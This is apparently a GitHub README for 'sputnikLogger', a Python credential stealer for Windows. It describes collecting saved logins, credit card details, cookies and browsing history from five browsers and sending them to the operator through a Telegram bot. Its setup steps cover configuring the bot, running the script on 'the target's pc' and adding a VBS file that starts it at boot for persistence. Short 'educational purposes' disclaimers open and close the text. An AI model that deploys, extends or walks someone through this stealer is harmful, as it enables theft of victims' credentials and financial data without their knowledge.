This script is designed to gather browser-related data, including login credentials, cookies, web history, and download information. It also includes functionality to send this data via Telegram for educational and research purposes only. Unauthorized use of this script may violate privacy laws. Ensure you have appropriate permissions before running this script.
This Python script collects various data from installed browsers on a Windows system and sends it via Telegram. It supports the following browsers:
- Google Chrome
- Microsoft Edge
- Firefox
- Brave
- Opera
- Data Collection: Retrieves login credentials, credit card details, cookies, web history, and download information from supported browsers.
- Encryption: Utilizes AES encryption for sensitive data.
- Telegram Integration: Sends collected data securely via Telegram bot API.
-
Clone the repository: git clone https://github.com/MasterOfBrokenLogic/sputnikLogger.git cd sputnikLogger
-
Install dependencies: pip install -r requirements.txt
-
Configure Telegram bot:
- Obtain a Telegram Bot token from BotFather.
- Replace
TELEGRAM_TOKEN
andTELEGRAM_CHAT_ID
in the script with your bot token and chat ID.
-
Run the script on the target's pc by using the command or create a vbs file that will run the script on the startup: sputnikLogger.py
-
Monitor script output:
- The script will collect data from installed browsers.
- Data will be sent securely to Telegram if configured.
- Encryption: Uses AES encryption for secure data handling.
- Token Security: Handle Telegram bot tokens securely to prevent unauthorized access.
- Data Privacy: Respect user privacy and legal requirements when deploying this script.
This script is for educational and research purposes only. Ensure compliance with local laws and obtain proper authorization before using it. The author assumes no liability for unauthorized or illegal use of this script.